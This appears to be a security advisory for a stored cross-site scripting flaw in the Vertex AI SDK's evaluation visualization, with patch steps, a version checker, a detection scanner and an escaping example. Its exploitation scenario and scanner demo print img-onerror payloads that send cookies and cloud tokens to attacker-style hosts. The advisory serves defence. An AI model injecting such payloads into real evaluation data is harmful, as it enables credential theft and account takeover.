If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| google-cloud-aiplatform | pip | >= 1.98.0, < 1.131.0 | 1.131.0 |
If you install google-cloud-aiplatform anywhere in the listed range, treat the environment as affected; versions before 1.98.0 and from 1.131.0 onward are not impacted.
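A minimal sketch for checking whether the installed SDK falls inside the vulnerable range. It assumes the `packaging` library is available (it ships as a dependency of pip in most environments); the function name is illustrative, not part of any official tooling.

```python
# Check whether the installed google-cloud-aiplatform falls in the
# vulnerable range (>= 1.98.0, < 1.131.0).
from importlib.metadata import version, PackageNotFoundError
from packaging.version import Version

def is_vulnerable(pkg: str = "google-cloud-aiplatform") -> bool:
    """Return True if `pkg` is installed and inside the vulnerable range."""
    try:
        installed = Version(version(pkg))
    except PackageNotFoundError:
        return False  # not installed in this environment
    return Version("1.98.0") <= installed < Version("1.131.0")

if __name__ == "__main__":
    print("vulnerable" if is_vulnerable() else "not affected")
```

Running this inside each notebook kernel (rather than once on the host) catches per-environment installs that a host-level `pip show` would miss.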
Recommended Action
1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 (`pip install --upgrade google-cloud-aiplatform`). Verify with `pip show google-cloud-aiplatform`.
2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.
3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.
4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.
5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.
6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.
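The detection step above can be sketched as a pre-visualization scan over evaluation records. The regex patterns and function name below are illustrative heuristics, not from the advisory or the SDK; tune them to your pipeline before relying on them.

```python
import re

# Heuristic patterns for the markers called out in the detection step:
# script tags, inline JS event handlers, and javascript: URIs.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.IGNORECASE),
    re.compile(r"\bon(?:error|load|click)\s*=", re.IGNORECASE),
    re.compile(r"javascript\s*:", re.IGNORECASE),
]

def flag_suspicious_fields(record: dict) -> list[str]:
    """Return the keys of any string fields matching an XSS heuristic."""
    flagged = []
    for key, value in record.items():
        if isinstance(value, str) and any(p.search(value) for p in XSS_PATTERNS):
            flagged.append(key)
    return flagged

row = {
    "prompt": "Summarize the report",
    "response": '<img src=x onerror=fetch("https://attacker.example/x")>',
}
print(flag_suspicious_fields(row))  # → ['response']
```

Regex scanning is a tripwire, not a guarantee: obfuscated payloads can evade it, so treat a clean scan as "no known markers found" and still sanitize at render time.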
Technical Details
NVD Description
Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.
Exploitation Scenario
An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.
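The patched SDK's actual fix is not reproduced here; as a general illustration of why the scenario above fails against escaped output, the sketch below shows the standard mitigation of HTML-escaping untrusted strings before embedding them in visualization markup, using only the stdlib `html` module. The `render_cell` helper is hypothetical.

```python
import html

def render_cell(untrusted: str) -> str:
    """Escape an untrusted evaluation-result string before embedding it
    in visualization HTML, so any markup renders as inert text."""
    return f"<td>{html.escape(untrusted, quote=True)}</td>"

payload = '<img src=x onerror=fetch("https://attacker.example/exfil")>'
print(render_cell(payload))
```

With escaping applied, the `<img>` tag arrives in the browser as literal text, so the `onerror` handler never executes and no request to the attacker's host is made.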
Weaknesses (CWE)
- CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)
References
- docs.cloud.google.com/support/bulletins
- github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud
- github.com/advisories/GHSA-qv8j-hgpc-vrq8
- github.com/googleapis/python-aiplatform/commit/8a00d43dbd24e95dbab6ea32c63ce0a5a1849480
- github.com/googleapis/python-aiplatform/releases/tag/v1.131.0
- nvd.nist.gov/vuln/detail/CVE-2026-2472